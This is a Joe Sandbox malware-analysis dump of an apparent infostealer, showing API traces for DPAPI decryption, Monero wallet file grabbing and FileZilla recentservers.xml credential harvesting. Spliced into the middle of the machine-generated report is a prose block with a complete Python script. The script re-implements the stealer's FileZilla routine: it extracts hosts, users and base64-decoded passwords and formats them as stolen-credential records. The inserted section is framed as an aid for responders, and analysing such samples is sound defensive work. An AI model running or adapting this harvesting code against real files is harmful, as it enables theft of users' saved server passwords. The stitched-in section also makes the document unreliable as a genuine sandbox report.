                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 51da41508de41b7a2a166d34ad81beff9bdb1f4682b468da0ac0d0cf3ee5695d
                                  • Instruction ID: a4c3fdf6aa78c0db109a56efade5fc65ab35eb8ec726b27d02025a404b7a1a34
                                  • Opcode Fuzzy Hash: 51da41508de41b7a2a166d34ad81beff9bdb1f4682b468da0ac0d0cf3ee5695d
                                  • Instruction Fuzzy Hash: 0C410A71A40A28AFDB24DB54CC85B9BB7B4BB48302F4081D9E619E7290D771AEC5CF51
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F69B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F69BA3
                                  • LocalFree.KERNEL32(?), ref: 00F69BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: e9b2e091215bbd079728d4f17e9a631b9034c679ee394c04bbb18e0ca4419420
                                  • Instruction ID: 7f6ec704158eb49c343850dc4665c09b81383d10b7fc8dba71abec9ab8c08863
                                  • Opcode Fuzzy Hash: e9b2e091215bbd079728d4f17e9a631b9034c679ee394c04bbb18e0ca4419420
                                  • Instruction Fuzzy Hash: A211CCB8A00209DFDB04DF94D985AAE77B9FF88300F104568E91597394D774AE50CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: B|}$$w;
                                  • API String ID: 0-4193640250
                                  • Opcode ID: 26cd4df856a06c6d9cc977a816cc82a3bbc9fc4935480e16878d49d1fddf3479
                                  • Instruction ID: af139a12045831ab041713102206c3f8487424daa63111b8814da68be3582d8f
                                  • Opcode Fuzzy Hash: 26cd4df856a06c6d9cc977a816cc82a3bbc9fc4935480e16878d49d1fddf3479
                                  • Instruction Fuzzy Hash: 905109F36186009FF304AE29EC8577AB7D5EBD4320F16893DEAC5C3740E93598058693
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: d~7
                                  • API String ID: 0-1837143037
                                  • Opcode ID: 0cdf5c7bcc9c391455ef1c89afbc9d5b7a47602d071257a27747be2eaffea320
                                  • Instruction ID: b13b30753f219975cbb82946418853d5473278b6e0277d1381b8098923606f55
                                  • Opcode Fuzzy Hash: 0cdf5c7bcc9c391455ef1c89afbc9d5b7a47602d071257a27747be2eaffea320
                                  • Instruction Fuzzy Hash: D48127B3E093149BE3046E2DDC8573AF7DAEFD4760F1A863ED98887784D93559018782
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Oa~L
                                  • API String ID: 0-1710256035
                                  • Opcode ID: 8014eaf2cb61c3cb4f524029974531707ca23e7c673962f9ccc4089b3875e396
                                  • Instruction ID: cd5191cc9f7bb23ed5372da9e16d799e9b3326e9473bb01eb4b0070bfbd1087b
                                  • Opcode Fuzzy Hash: 8014eaf2cb61c3cb4f524029974531707ca23e7c673962f9ccc4089b3875e396
                                  • Instruction Fuzzy Hash: 636128F3A186105FE7446D7CED8977ABAD5DBD4320F2A863DEAD4C7784E934480486C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: {Gzs
                                  • API String ID: 0-4101231166
                                  • Opcode ID: a1f301567bab9b127e6ec999fba2215f5801a0e44955ee49e86204647b620f7c
                                  • Instruction ID: 533a0d5b43f126e8218b539da87237d4f6123845cee799099087ccf78bfc96db
                                  • Opcode Fuzzy Hash: a1f301567bab9b127e6ec999fba2215f5801a0e44955ee49e86204647b620f7c
                                  • Instruction Fuzzy Hash: 7461B4B39082109BE3146F28DD8536AFBE5EF54720F1A4A3DD9D897780E6399C44CB87
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3b5caf0be66455328efee8b3b533d6e2a681844132a90348192dc3551ff5906
                                  • Instruction ID: 6464ca9dff057e89589a8c452d4ef1b548c33f505a09ca29ce6aebe57ac57742
                                  • Opcode Fuzzy Hash: a3b5caf0be66455328efee8b3b533d6e2a681844132a90348192dc3551ff5906
                                  • Instruction Fuzzy Hash: 988154B3B182144BE3446E3DDC8637AB7D9EB90320F1A463DEAC5C7784E939980587D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d515305e9c0953646115b4ff87341af7aa3594145d06633f7ea78f12faabfb23
                                  • Instruction ID: c78f10e85b480d186a281222e01427f5baa301169017a72eeee74ed25629dc30
                                  • Opcode Fuzzy Hash: d515305e9c0953646115b4ff87341af7aa3594145d06633f7ea78f12faabfb23
                                  • Instruction Fuzzy Hash: 894126B3A087149BE3106A6EEC8575AF7E8EB90360F174539DAC893344E5755C058686
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00F80DBA,00F80DB7,00F80DB6,00F80DB3), ref: 00F70362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F70369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F70385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F703CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F703DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00F70419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F70463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F7051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F70532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F7054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F70562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00F70571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00F70580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F70593
                                  • lstrcat.KERNEL32(?,00F81678), ref: 00F705A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F705B5
                                  • lstrcat.KERNEL32(?,00F8167C), ref: 00F705C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00F705D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F705E6
                                  • lstrcat.KERNEL32(?,00F81688), ref: 00F705F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00F70604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F70617
                                  • lstrcat.KERNEL32(?,00F81698), ref: 00F70626
                                  • lstrcat.KERNEL32(?,00F8169C), ref: 00F70635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F80DB2), ref: 00F7068E
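The API chain above is the sample's FileZilla credential collector: the file-reading helper at 00F699C0 (CreateFileA, GetFileSizeEx, LocalAlloc, ReadFile) fills a buffer, StrStrA then locates `<Host>`, `<Port>`, `<User>` and the exact opening tag `<Pass encoding="base64">`, each followed by an lstrlen-bounded copy, and a fixed lstrcat chain at 00F70562..00F70635 assembles a text record from the literals "browser: FileZilla", "profile: null", "url: ", "login: " and "password: ". The same helper is also reached with `\Monero\wallet.keys` in the subcall list, so it is a general file grabber shared by several collectors. FileZilla stores saved-site passwords base64-encoded in that element layout (sitemanager.xml and recentservers.xml), which is why the search string carries the encoding attribute. The Python below is an added example for responders and is not code from the sample, from Joe Sandbox or from this report; it reproduces the parse on a constructed sitemanager.xml-style buffer so the exact fields that would leave the host are visible. The separator literals at 00F81678, 00F8167C, 00F81688, 00F81698 and 00F8169C are not resolved in the trace, so the ":" between host and port and the newline after each field are assumptions.

```python
"""Added example: re-implementation of the FileZilla credential harvesting seen
in the API trace (StrStrA per tag, lstrcat of the record literals).  Not code
from the analysed sample, from Joe Sandbox, or from this report."""
from __future__ import annotations

import base64
import binascii

# Constructed input in the layout FileZilla uses for sitemanager.xml /
# recentservers.xml.  Hosts, users and passwords are made up for this example.
SAMPLE_SITEMANAGER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>backup-user</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>Backup server</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">UEBzc3cwcmQh</Pass>
    </Server>
    <Server>
      <Host>ftp.legacy.test</Host>
      <Port>21</Port>
      <User>old</User>
      <Pass>legacy-plain</Pass>
    </Server>
  </Servers>
</FileZilla3>
"""

# The four search strings passed to StrStrA at 00F70385..00F70463.
HOST_TAG = "<Host>"
PORT_TAG = "<Port>"
USER_TAG = "<User>"
PASS_TAG = '<Pass encoding="base64">'

# Separators: the literals at 00F81678/00F8167C/00F81688/00F81698/00F8169C are
# not resolved in the trace, so ":" and "\n" here are assumptions, not report data.
HOST_PORT_SEP = ":"
EOL = "\n"


def _text_after(buf: str, open_tag: str, start: int) -> tuple[str | None, int]:
    """StrStrA(buf+start, open_tag), then copy up to the next '<' (the lstrlen
    bounded copy in the trace).  Returns (None, start) if the tag is absent."""
    i = buf.find(open_tag, start)
    if i < 0:
        return None, start
    i += len(open_tag)
    j = buf.find("<", i)
    if j < 0:
        j = len(buf)
    return buf[i:j], j


def decode_filezilla_pass(encoded: str) -> str:
    """Decode a <Pass encoding="base64"> value; malformed input is returned
    unchanged so one bad entry does not stop the walk."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return encoded


def parse_filezilla_servers(xml_text: str) -> list[dict]:
    """Walk the buffer one <Host> at a time.  Each chunk is bounded by the next
    <Host> so a missing tag cannot bleed into the following <Server>.  Entries
    without the exact '<Pass encoding="base64">' tag are skipped, which is what
    the sample's search string does to plaintext entries from old FileZilla builds."""
    entries: list[dict] = []
    pos = xml_text.find(HOST_TAG)
    while pos >= 0:
        nxt = xml_text.find(HOST_TAG, pos + len(HOST_TAG))
        chunk = xml_text[pos:nxt if nxt >= 0 else len(xml_text)]
        host, cur = _text_after(chunk, HOST_TAG, 0)
        port, cur = _text_after(chunk, PORT_TAG, cur)
        user, cur = _text_after(chunk, USER_TAG, cur)
        enc_pass, _ = _text_after(chunk, PASS_TAG, cur)
        if enc_pass is not None:
            entries.append({"host": host, "port": port or "", "user": user or "",
                            "password": decode_filezilla_pass(enc_pass)})
        pos = nxt
    return entries


def format_stealer_record(entry: dict) -> str:
    """Rebuild the record assembled by the lstrcat chain at 00F70562..00F70635."""
    return ("browser: FileZilla" + EOL
            + "profile: null" + EOL
            + "url: " + entry["host"] + HOST_PORT_SEP + entry["port"] + EOL
            + "login: " + entry["user"] + EOL
            + "password: " + entry["password"] + EOL + EOL)


def harvest(xml_text: str) -> str:
    """Everything the sample would write for this file, as one text blob."""
    return "".join(format_stealer_record(e) for e in parse_filezilla_servers(xml_text))


if __name__ == "__main__":
    print(harvest(SAMPLE_SITEMANAGER_XML), end="")
```

Run as a script to print the records; `parse_filezilla_servers` returns the structured entries for use in an exposure assessment. The third constructed entry stores its password without the encoding attribute and is deliberately not picked up, mirroring the effect of the sample's exact search string; a site manager file from the affected host should be checked for both forms before deciding which credentials to rotate.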
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
